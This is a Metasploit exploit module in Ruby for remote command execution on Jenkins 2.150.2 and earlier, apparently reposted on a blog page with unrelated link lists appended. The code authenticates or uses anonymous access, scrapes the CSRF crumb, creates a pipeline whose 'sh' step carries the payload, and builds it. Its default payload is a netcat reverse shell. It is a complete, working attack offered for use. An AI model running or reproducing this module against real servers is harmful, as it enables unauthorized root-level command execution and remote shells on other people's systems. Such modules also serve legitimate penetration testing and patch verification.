##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote

  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})

        super(update_info(info,

          'Name'           => 'Jenkins <= 2.150.2 Remote Command Execution via Node JS (Metasploit)',

          'Description'    => %q{

                  This module can run commands on the system using Jenkins users who has JOB creation and BUILD privileges.

                  The vulnerability is exploited by a small script prepared in NodeJS.

                  The sh parameter allows us to run commands.

                  Sample script:

                                node {

                                      sh "whoami"

                                }

                  In addition, ANONYMOUS users also have the authority to JOB create and BUILD by default.

                  Therefore, all users without console authority can run commands on the system as root privilege.

          },

          'Author'         => [

            'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module

          ],

          'License'        => MSF_LICENSE,

          'References'     =>

            [

              ['URL', 'https://pentest.com.tr/exploits/Jenkins-Remote-Command-Execution-via-Node-JS-Metasploit.html']

            ],

          'Privileged'     => true,

          'Payload'        =>

            {

              'DisableNops' => true,

              'Space'       => 512,

              'Compat'      =>

                {

                  'PayloadType' => 'cmd',

                  'RequiredCmd' => 'reverse netcat generic perl ruby python telnet',

                }

            },

          'Platform'       => 'unix',

          'Arch'           => ARCH_CMD,

          'Targets'        => [[ 'Jenkins <= 2.150.2', { }]],

          'DisclosureDate' => 'Feb 11 2019',

          'DefaultTarget'  => 0,

          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }))

          register_options(

            [

                OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]),

                OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]),

                OptString.new('PATH', [ true, 'The path to jenkins', '/' ]),

            ], self.class)

    end

##

# Jenkins activity check

##

    def check

        res = send_request_cgi({'uri' => "/login"})

        if res and res.headers.include?('X-Jenkins')

            return Exploit::CheckCode::Detected

        else

            return Exploit::CheckCode::Safe

        end

    end

    def exploit

        print_status('Attempting to login to Jenkins dashboard')

        res = send_request_cgi({'uri' => "/script"})

        if not (res and res.code)

            fail_with(Exploit::Failure::Unknown)

        end

        sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]

        @cookie = "#{sessionid}"

    print_status("#{sessionid}")

        if res.code != 200

            print_status('Logging in...')

##

# Access control and information

##

            res = send_request_cgi({

                'method'    => 'POST',

                'uri'       => "/j_acegi_security_check",

                'cookie'    => @cookie,

                'vars_post' =>

                    {

                        'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),

                        'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'),

                        'Submit'     => 'Sign+in'

                    }

            })

            if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/

                print_error('User Login failed. If anonymous login is active, exploit will continue.')

            end

        else

            print_status('No authentication required, skipping login...')

        end

##

# Check Crumb for create pipeline

##

    cookies = res.get_cookies

        res = send_request_cgi({

        'method' => 'GET',

            'uri' => "/view/all/newJob",

            'cookie'  => cookies

        })

        html = res.body

        if html =~ /Jenkins-Crumb/

          print_good("Login Successful")

        else

          print_status("Service found, but login failed")

          exit 0

        end

    crumb = res.body.split('Jenkins-Crumb')[1].split('");<')[0].split('"').last

        print_status("Jenkins-Crumb: #{crumb}")

##

# Create Pipeline

##

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/view/all/createItem",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'name' => "cmd",

                    'mode' => "org.jenkinsci.plugins.workflow.job.WorkflowJob",

                    'from' => "",

                    'Jenkins-Crumb' => "#{crumb}",

                    'json' => "%7B%22name%22%3A+%22cmd%22%2C+%22mode%22%3A+%22org.jenkinsci.plugins.workflow.job.WorkflowJob%22%2C+%22from%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%22528f90f71b2d2742299b4daf503130ac%22%7"

                }

        })

##

# Configure Pipeline

##

        shell = payload.encoded

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/job/cmd/configSubmit",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'description' => "cmd",

                    'Jenkins-Crumb' => "#{crumb}",

                    'json' => "{\"description\": \"cmd\", \"properties\": {\"stapler-class-bag\": \"true\", \"hudson-security-AuthorizationMatrixProperty\": {}, \"jenkins-model-BuildDiscarderProperty\": {\"specified\": false, \"\": \"0\", \"strategy\": {\"daysToKeepStr\": \"\", \"numToKeepStr\": \"\", \"artifactDaysToKeepStr\": \"\", \"artifactNumToKeepStr\": \"\", \"stapler-class\": \"hudson.tasks.LogRotator\", \"$class\": \"hudson.tasks.LogRotator\"}}, \"org-jenkinsci-plugins-workflow-job-properties-DisableConcurrentBuildsJobProperty\": {\"specified\": false}, \"org-jenkinsci-plugins-workflow-job-properties-DisableResumeJobProperty\": {\"specified\": false}, \"com-coravy-hudson-plugins-github-GithubProjectProperty\": {}, \"org-jenkinsci-plugins-workflow-job-properties-DurabilityHintJobProperty\": {\"specified\": false, \"hint\": \"MAX_SURVIVABILITY\"}, \"org-jenkinsci-plugins-pipeline-modeldefinition-properties-PreserveStashesJobProperty\": {\"specified\": false, \"buildCount\": \"1\"}, \"hudson-model-ParametersDefinitionProperty\": {\"specified\": false}, \"jenkins-branch-RateLimitBranchProperty$JobPropertyImpl\": {}, \"org-jenkinsci-plugins-workflow-job-properties-PipelineTriggersJobProperty\": {\"triggers\": {\"stapler-class-bag\": \"true\"}}}, \"disable\": false, \"hasCustomQuietPeriod\": false, \"quiet_period\": \"5\", \"displayNameOrNull\": \"\", \"\": \"0\", \"definition\": {\"script\": \"node {\\n    sh \\\"#{shell}\\\"\\n}\", \"\": [\"try sample Pipeline...\", \"\\u0001\\u0001\"], \"sandbox\": true, \"stapler-class\": \"org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition\", \"$class\": \"org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition\"}, \"core:apply\": \"\", \"Jenkins-Crumb\": \"#{crumb}\"}",

                    'Submit' => "Save"

                }

        })

        if res.code == 302

          print_good("Pipeline was created and Node JS code was integrated.")

        end

##

# Build Pipeline and Execute payload

##

        print_status("Trying to get remote shell...")

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/job/cmd/build?delay=0sec",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'Jenkins-Crumb' => "#{crumb}"

                }

        })

    handler

    end

end

##

# End

##

[EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)的更多相关文章

  1. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  3. PowerShell vs. PsExec for Remote Command Execution

    Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...

  4. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  5. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

  6. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  7. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

  8. struts2 CVE-2013-1965 S2-012 Showcase app vulnerability allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  9. struts2 CVE-2013-2251 S2-016 action、redirect code injection remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

随机推荐

  1. SSM框架整合思想

    -------------------siwuxie095                                 SSM 框架整合思想         1.SSM 框架,即 SpringMV ...

  2. Python练习-列表生成式-2018.11.30

    #用列表生成式创建[1x1, 2x2, 3x3, ..., 10x10] print([x*x for x in range(1,11)]) #用列表生成式创建[2x2, 4x4,,6×6,..., ...

  3. [leetcode]36. Valid Sudoku验证数独

    Determine if a 9x9 Sudoku board is valid. Only the filled cells need to be validated according to th ...

  4. Vim中YouCompleteMe插件安装

    背景 YouCompleteMe需要使用GCC进行编译,然而Centos 6.7默认的GCC版本太低,所以需要使用devtools-2,用来安装多个版本GCC手动编译安装GCC的坑简直不要太多(类似于 ...

  5. CSS三种插入样式表格式

    首先简单理解浏览器与网页的交互过程 CSS样式表(stylesheet) cascading style sheet 级联样式表 表现HTML或XHTML文件样式的计算机语言:包含对字体.颜色.边距. ...

  6. 主机性能监控之wmi 获取磁盘信息

    标 题: 主机性能监控之wmi 获取磁盘信息作 者: itdef链 接: http://www.cnblogs.com/itdef/p/3990541.html 欢迎转帖 请保持文本完整并注明出处 仅 ...

  7. tensorflow o. 到 tensorflow 1. 部分改变

    一下内容为笔者实际应用中遇到的问题,可能(必须)不全,后面会持续更新. (1) tf.nn.run_cell   改为   tf.contrib.rnn (2) tf.reduce_mean   改为 ...

  8. delete,truncate ,drop区别

    use [database_name]go delete from table_nameTest  where FCRTime<(Select CONVERT(varchar(100),DATE ...

  9. 别人的Linux私房菜(7)文件与目录管理

    - 代表上一个工作目录 ~username代表用户所在的家目录 cd切换目录  配合之上的参数 .   ..   /    ~    ~name     (change directory) pwd显 ...

  10. 连接hive

    bin/hiveserver2 nohup bin/hiveserver2 1>/var/log/hiveserver.log 2>/var/log/hiveserver.err & ...